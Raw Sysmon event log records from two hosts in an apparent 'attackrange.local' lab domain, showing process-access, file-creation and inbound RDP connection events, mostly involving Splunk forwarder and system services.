09:03:37.760{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977096Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.760{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977095Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.760{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977094Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.760{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977093Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.760{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-88E9-6151-8E79-00000000FD01}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977092Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.760{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977091Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.760{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88E9-6151-8E79-00000000FD01}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977090Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.745{69CF5F33-88E9-6151-8E79-00000000FD01}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977089Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.260{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=261FDF425B670BDA00316FC41B76A54E,SHA256=50925C743040DA66E935E11C221B23E676D7492728772C76C74094E512FDBC9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977088Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.260{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F87A395283F2BB265A8C1F59819BA45,SHA256=7DE035D710A6CE49FB62B930693FDAE3F9729ECBA332BCC62E204780C8E51097,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048445Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:38.612{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83F9DD0C8BA1B1329A4222CFB00FF370,SHA256=1BA16F3FEC5703F77A493F904637A6055021AEBEFB9E562B9ED8EBE47C1625C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977105Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:38.963{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D213D411EAAAFC2214AA9642C04831A5,SHA256=9794D3119343D9A4F05C6F21729821EBD92F64A331278E58ED2B77AF3C9EB7F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977104Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:38.260{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=034DA90B56CDA69FDBBF4E7213A2F4B5,SHA256=2625E89B39BBD4D83A1D49C07E7AA8EFA5A78DEC2399BE83EFE4331BB6C734FB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048444Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:38.575{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000977103Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:34.211{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-44696-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001048451Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:38.216{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-49948-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001048450Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:38.068{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55299-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048449Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:39.743{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CC66E38347D5D64CDE8B2CA81404393,SHA256=3B312A0C358745DACE2DB5AD9C4AA5EEFC9627462EC291A09E831FDBBB65A0F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048448Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:39.743{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3DC41C9C6165B3655236716EC51694A8,SHA256=92ED8C38B87B149579CE5A871472E1E6199DCE81694F8D63ACCEA28FA96FB19D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048447Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:39.627{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47A0F10AD524DA9579DACBAD9D156456,SHA256=775CBCB300772E2F90AEB5CD0FCCCCE9BE266ED056F886B7D21D62C3A20495BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977109Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:39.307{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11EFB54E60BEAC683DFAAF9AEEEB90C1,SHA256=475EB94E97ED41BD4B60C503CFB33F9A150F5AAA0C6D538505323BDDBB5A2B6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048446Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:39.197{5EBD8912-7F30-614D-1200-00000000FC01}492NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A47400881E5DAC66BB62DBB39BFDE09B,SHA256=C41F477B722CABEF74D75471E35E0EAC4BD64C26F102B74C271E97B1CE7C12F5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977108Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:36.328{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-56517-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977107Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:36.309{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54796-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977106Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:35.858{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59284-false10.0.1.12-8000- 23542300x80000000000000001048452Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:40.632{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A6A0177D7F102ABB954D8662087CE86,SHA256=48A14217ECB8515A95B32759837D8C0E1C645D8590D240C796AA9F2F51A322A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977112Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:40.307{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9563CE4145D7EC235AA1D9C6538C5D8,SHA256=D41ABF98ED6D8C890500FC253EDB46EF367245C761AEA31071976FA864B8F963,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977111Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:37.425{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50220-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977110Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:40.166{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=17DB83CDB05A43636A1CB20F69F2EBC2,SHA256=04B9C7985E6E330AE22161FF9B5C28CABFA5BA8F7F72C25BEFAD0E2548BDE489,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977113Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:41.322{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E1B9C5D61EAE1989E566F91D82F195A,SHA256=07E0F84071C7A0C01881536881E0CCCC7CA7F5540BBCDE43197EB142237B2D42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048453Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:41.700{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3860D619870846C1E492982AE45B344A,SHA256=1826BFC6E5194D843A5416DB30710E3A8A20AE4BC6224AA35B594935CEFB5620,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048454Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:42.715{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D520A5AE0046714388EE8DDEF4AA5F95,SHA256=E120FC8E2C24FDD1A899E5446E0DF13241BF1841131E480AA3003DA5FED464E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977114Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:42.322{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADD7E4B460CC72EB9654BCBCB72D2758,SHA256=C7B74B5FCCE8B615F46957FDD0558F00D1625CFE83E8B6B3777251FDE1E86626,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048457Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:41.685{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57560-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048456Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:43.729{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1644DE28F7DAD32DCFACBD919F6162A2,SHA256=D27C9E764398F9B3FB3CC398D53647548FDCF307F503C757F3BDA9B723937712,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977116Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:43.328{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F4276F14A00A33A90BAE4D6B5E4350C,SHA256=F803E4DDF8F0028C2071D8524436A4A263A8E8F900E9E80EE90CE2CC9D9A4E60,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048455Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:39.908{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53237-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000977115Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:39.375{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-9286-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x80000000000000001048468Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:43.001{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58440-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048467Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:44.760{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4156A1803766FD40E87E8D97F2DF4903,SHA256=536A2A2F728DA7DA04AF6D2C2D5168743F2A0A3D81D19B5976AD8A3F31A8FD05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977118Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:44.469{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE52508C27469F6CB6AA20D4709C4CBF,SHA256=6FE5A0ADD3BB39B6A0A7273FEB4036C2D5568AB6B0B65F386F6727C252B04817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977117Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:44.391{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9472F52CDB2D22823A4CDFDC2AE7F71,SHA256=FE1F5F80A6EF267FAED569A15FC16559623594050CAB99D68E1B88BFB45BBDA3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048466Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:44.598{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88F0-6151-FA79-00000000FC01}5640C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048465Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:03:44.598{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048464Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 